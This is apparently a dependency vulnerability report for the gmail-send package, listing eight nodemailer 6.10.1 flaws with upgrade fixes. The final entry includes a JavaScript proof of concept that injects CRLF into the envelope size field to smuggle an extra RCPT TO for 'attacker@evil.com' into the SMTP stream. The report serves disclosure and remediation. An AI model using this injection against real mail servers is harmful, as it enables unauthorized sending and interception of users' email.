| Vulnerabilities | 8 via 8 paths |
|---|---|
| Dependencies | 2 |
| Source | GitHub |
high severity
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
- Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1
  Remediation: Upgrade to nodemailer@7.0.11.
Overview
nodemailer is a library for "easy as cake" e-mail sending from your Node.js applications.
Affected versions of this package are vulnerable to Uncontrolled Recursion in the addressparser function. An attacker can cause the process to terminate immediately by sending an email address header containing deeply nested groups separated by many colon (:) characters.
Remediation
Upgrade nodemailer to version 7.0.11 or higher.
high severity (new)
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
- Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1
  Remediation: Upgrade to nodemailer@8.0.9.
Overview
nodemailer is a library for "easy as cake" e-mail sending from your Node.js applications.
Affected versions of this package are vulnerable to CRLF Injection via the comment field in the list message option. An attacker can inject arbitrary headers into generated email messages by supplying crafted input containing CRLF sequences.
Remediation
Upgrade nodemailer to version 8.0.9 or higher.
high severity (new)
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
- Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1
  Remediation: Upgrade to nodemailer@9.0.1.
Overview
nodemailer is a library for "easy as cake" e-mail sending from your Node.js applications.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the message-level raw option, which bypasses the disableFileAccess and disableUrlAccess flags. An attacker can read arbitrary local files or perform server-side request forgery by supplying crafted input in the raw field; because the intended access restrictions are bypassed, the resulting sensitive data is sent to an attacker-controlled recipient.
Remediation
Upgrade nodemailer to version 9.0.1 or higher.
medium severity
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
- Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1
  Remediation: Upgrade to nodemailer@8.0.5.
Overview
nodemailer is a library for "easy as cake" e-mail sending from your Node.js applications.
Affected versions of this package are vulnerable to CRLF Injection via the name configuration option. An attacker can inject arbitrary SMTP commands by supplying carriage return and line feed sequences, enabling unauthorized email sending, sender spoofing, and phishing attacks before authentication occurs.
Remediation
Upgrade nodemailer to version 8.0.5 or higher.
medium severity
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
- Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1
  Remediation: Upgrade to nodemailer@7.0.7.
Overview
nodemailer is a library for "easy as cake" e-mail sending from your Node.js applications.
Affected versions of this package are vulnerable to Interpretation Conflict due to improper handling of quoted local-parts containing the @ character. An attacker can cause emails to be sent to unintended external recipients, or bypass domain-based access controls, by crafting specially formatted email addresses whose quoted local-part contains @.
Remediation
Upgrade nodemailer to version 7.0.7 or higher.
medium severity (new)
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
- Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1
  Remediation: Upgrade to nodemailer@8.0.8.
Overview
nodemailer is a library for "easy as cake" e-mail sending from your Node.js applications.
Affected versions of this package are vulnerable to Improper Certificate Validation due to the use of rejectUnauthorized: false in the internal HTTPS client, which disables TLS certificate verification during OAuth2 token retrieval. An attacker who can perform a machine-in-the-middle attack on that HTTPS connection can intercept the OAuth2 credentials and tokens it carries.
Remediation
Upgrade nodemailer to version 8.0.8 or higher.
medium severity (new)
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
- Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1
  Remediation: Upgrade to nodemailer@8.0.9.
Overview
nodemailer is a library for "easy as cake" e-mail sending from your Node.js applications.
Affected versions of this package are vulnerable to Missing Authorization in jsonTransport, which fails to enforce the file and URL access restrictions during message normalization. An attacker can read local files or trigger outbound HTTP requests by supplying crafted message content fields such as an attachment path or text.href.
Remediation
Upgrade nodemailer to version 8.0.9 or higher.
low severity
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
- Introduced through: gmail-send@alykoshin/gmail-send › nodemailer@6.10.1
  Remediation: Upgrade to nodemailer@8.0.4.
Overview
nodemailer is a library for "easy as cake" e-mail sending from your Node.js applications.
Affected versions of this package are vulnerable to CRLF Injection via the envelope.size parameter in the sendMail function. An attacker can inject arbitrary SMTP commands by supplying CRLF characters in the size property, which is concatenated directly into the SMTP command stream. This can result in unauthorized recipients being added to outgoing emails or in other SMTP commands being executed.
Note: This is only exploitable if the application explicitly passes a custom envelope object with a user-controlled size property to the mail sending process.
PoC

```javascript
const net = require('net');
const nodemailer = require('nodemailer');

// Minimal SMTP server that logs every raw command it receives, so the
// injected RCPT TO line is visible in the command stream.
const server = net.createServer(socket => {
  socket.write('220 localhost ESMTP\r\n');
  let buffer = '';
  socket.on('data', chunk => {
    buffer += chunk.toString();
    const lines = buffer.split('\r\n');
    buffer = lines.pop(); // keep any partial trailing line for the next chunk
    for (const line of lines) {
      if (!line) continue;
      console.log('C:', line);
      if (line.startsWith('EHLO')) {
        // Advertise SIZE so the client appends SIZE=... to MAIL FROM
        socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
      } else if (line.startsWith('MAIL FROM')) {
        socket.write('250 OK\r\n');
      } else if (line.startsWith('RCPT TO')) {
        socket.write('250 OK\r\n');
      } else if (line === 'DATA') {
        socket.write('354 Start\r\n');
      } else if (line === '.') {
        socket.write('250 OK\r\n');
      } else if (line.startsWith('QUIT')) {
        socket.write('221 Bye\r\n');
        socket.end();
      }
    }
  });
});

server.listen(0, '127.0.0.1', () => {
  const port = server.address().port;
  console.log('SMTP server on port', port);
  console.log('Sending email with injected RCPT TO...\n');

  const transporter = nodemailer.createTransport({
    host: '127.0.0.1',
    port,
    secure: false,
    tls: { rejectUnauthorized: false },
  });

  transporter.sendMail({
    from: 'sender@example.com',
    to: 'recipient@example.com',
    subject: 'Normal email',
    text: 'This is a normal email.',
    // Custom envelope whose size field contains CRLF: vulnerable versions
    // concatenate it into the MAIL FROM line, so the text after \r\n
    // reaches the server as a separate SMTP command.
    envelope: {
      from: 'sender@example.com',
      to: ['recipient@example.com'],
      size: '100\r\nRCPT TO:<attacker@evil.com>',
    },
  }, (err) => {
    if (err) console.error('Error:', err.message);
    console.log('\nExpected output above:');
    console.log(' C: MAIL FROM:<sender@example.com> SIZE=100');
    console.log(' C: RCPT TO:<attacker@evil.com> <-- INJECTED');
    console.log(' C: RCPT TO:<recipient@example.com>');
    server.close();
    transporter.close();
  });
});
```
Remediation
Upgrade nodemailer to version 8.0.4 or higher.